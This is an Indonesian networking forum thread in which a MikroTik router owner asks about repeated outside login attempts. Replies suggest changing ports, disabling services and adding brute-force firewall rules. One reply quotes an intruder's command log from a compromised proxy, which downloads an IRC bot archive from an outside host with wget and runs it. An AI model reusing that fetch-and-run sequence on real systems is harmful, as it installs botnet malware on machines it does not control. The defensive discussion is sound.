Follow us on...
Follow us on G+ Follow us on Twitter Follow us on Facebook Watch us on YouTube
Register
Results 1 to 11 of 11

Thread: Mohon analisa

  1. #1
    Status
    Offline
    goenin's Avatar
    Baru Gabung
    Join Date
    Nov 2010
    Posts
    12
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0

    Mohon analisa

    dear master MT mohon bantuan, dapa log MT sya sudah lama muncul log yang mencurigakan, efeknya warnet jadi lemot mohon bantuan dan saran, ada yang coba login dari luar anehnya hampir setiap hari dia mencoba dan pada jam yang random

    sorry lupa skrin shootnya master

    Click here to enlarge
    Last edited by goenin; 22-10-2012 at 22:35.

  2. #2
    Status
    Offline
    arxe's Avatar
    Member Senior
    Join Date
    Sep 2009
    Location
    Kota Tanjungpinang, Indonesia
    Posts
    371
    Reviews
    Read 0 Reviews
    Downloads
    2
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by goenin Click here to enlarge
    dear master MT mohon bantuan, dapa log MT sya sudah lama muncul log yang mencurigakan, efeknya warnet jadi lemot mohon bantuan dan saran, ada yang coba login dari luar anehnya hampir setiap hari dia mencoba dan pada jam yang random
    lampirkan capture nya om

  3. #3
    Status
    Offline
    Anto.PJ's Avatar
    Forum Guru
    Join Date
    May 2011
    Location
    macz
    Posts
    1,696
    Reviews
    Read 0 Reviews
    Downloads
    7
    Uploads
    0
    Feedback Score
    0
    gimana mau dianalisa kalau datanya gak ada??

    pakai

  4. #4
    nuxer
    nuxer's Avatar
    ganti aja port default ssh sama telnet dan ftp mikrotiknya dengan port lain di bagian ip service.

  5. #5
    Status
    Offline
    tanpa_kabel's Avatar
    Member Senior
    Join Date
    Oct 2009
    Location
    Jakarta, Indonesia, Indonesia
    Posts
    363
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Kalo ga dipake, service tersebut dimatikan saja..

    cek di ip >> services

  6. #6
    Status
    Offline
    andrian's Avatar
    Baru Gabung
    Join Date
    Oct 2012
    Posts
    17
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Lognya apaan gan?ati2 tuh gan, banyak orang iseng, waspadalah..waspadalaaah..musti segera pasang firewall tuh gan, sama pastiin proxy ga bisa di akses dari luar

  7. #7
    Status
    Offline
    jakichan83's Avatar
    Newbie
    Join Date
    Oct 2012
    Location
    jakarta
    Posts
    30
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    IP nya sama terus gan? kalo sama, di blok aja IP nya

  8. #8
    Status
    Offline
    nfear's Avatar
    Newbie
    Join Date
    Oct 2012
    Posts
    22
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    ssh di disable aja atuh gan

  9. #9
    Status
    Offline
    Anto.PJ's Avatar
    Forum Guru
    Join Date
    May 2011
    Location
    macz
    Posts
    1,696
    Reviews
    Read 0 Reviews
    Downloads
    7
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by nuxer Click here to enlarge
    ganti aja port default ssh sama telnet dan ftp mikrotiknya dengan port lain di bagian ip service.
    setuju sama yang ini.. ganti aja 22 menjadi 222 dan 21 menjadi wirosableng atau terserah

    sekedar share pengalaman..
    kemarin ane nemu kasus di proxy os ubuntu sebuah warnet, portnya 22 default open dan di nat ke proxy..
    masalahnya user root adalah default.. passwordnya weak, cuma @dm1n doang..

    ane chek log perintahnya, waw.. proxynya di install bot.. sama orang tak dikenal yang masuk sebagai root (whois: dari negara rumania)..

    Code:
    ls -all
    cd /var/tmp
    uname -a
    ps -aux
    kill -9 747
    kill -9 748
    wget http://sinner.3x.ro/NNN/Arhive/KissMe-Mech.tgz << this is bot script, I think..
    tar zxvf KissMe-Mech.tgz
    rm -rf KissMe-Mech.tgz
    cd KissMe-Mech/
    chmod +x *
    ./run
    ./autorun
    kalo sudah terinstal, akan terjadi irc connection yang berasal dari proxy (lihat di conn-track)

    rajin2 chek log kalo dah ketemu kode2 yang dirasa gak pernah di masukkan waspadalah!!.. mungkin lain kali bukan hanya bot yang di install.. tapi "syahrini" Click here to enlarge

    atau script pemakan bandwidth..Click here to enlarge

  10. #10
    Status
    Offline
    alehaddad's Avatar
    Baru Gabung
    Join Date
    Jan 2013
    Location
    The Djakarta - On Desktop
    Posts
    6
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by nuxer Click here to enlarge
    ganti aja port default ssh sama telnet dan ftp mikrotiknya dengan port lain di bagian ip service.
    bener kata agan ini..Click here to enlarge

    dan ane tambahin sedikit script buat perlindungan mikrotik agan..

    /ip firewall filter
    add chain=input protocol=tcp dst-port=21 src-address-list=ftp_blacklist action=drop \
    comment="drop ftp brute forcers"

    add chain=output action=accept protocol=tcp content="530 Login incorrect" dst-limit=1/1m,9,dst-address/1m

    add chain=output action=add-dst-to-address-list protocol=tcp content="530 Login incorrect" \
    address-list=ftp_blacklist address-list-timeout=3h

    /ip firewall filter
    add chain=input protocol=tcp dst-port=22 src-address-list=ssh_blacklist action=drop \
    comment="drop ssh brute forcers" disabled=no

    add chain=input protocol=tcp dst-port=22 connection-state=new \
    src-address-list=ssh_stage3 action=add-src-to-address-list address-list=ssh_blacklist \
    address-list-timeout=10d comment="" disabled=no

    add chain=input protocol=tcp dst-port=22 connection-state=new \
    src-address-list=ssh_stage2 action=add-src-to-address-list address-list=ssh_stage3 \
    address-list-timeout=1m comment="" disabled=no

    add chain=input protocol=tcp dst-port=22 connection-state=new src-address-list=ssh_stage1 \
    action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=1m comment="" disabled=no

    add chain=input protocol=tcp dst-port=22 connection-state=new action=add-src-to-address-list \
    address-list=ssh_stage1 address-list-timeout=1m comment="" disabled=no

    add chain=forward protocol=tcp dst-port=22 src-address-list=ssh_blacklist action=drop \
    comment="drop ssh brute downstream" disabled=no

    NB: Sumber Om WIKI Click here to enlarge

    Mohon Direvisi bila ada yang salah salah... Click here to enlarge
    Last edited by alehaddad; 30-01-2013 at 15:24.

  11. #11
    Status
    Offline
    Amplak's Avatar
    Baru Gabung
    Join Date
    Nov 2012
    Posts
    19
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    ijin nyimak suhu2 lg ngebabar nih Click here to enlarge

 

 

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Mohon Bantuan Analisa.........
    By novalas in forum Scripting @ Mikrotik
    Replies: 15
    Last Post: 30-07-2011, 23:11
  2. analisa perencanaan poin to poin mk
    By rizalcom82 in forum Wireless Networking
    Replies: 19
    Last Post: 16-05-2011, 17:29
  3. mohon petunjuk
    By roggerlie in forum Wireless Networking
    Replies: 0
    Last Post: 21-03-2011, 23:28
  4. [HELP] Analisa squid.conf
    By sibesar in forum General Networking
    Replies: 0
    Last Post: 27-01-2009, 21:20

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •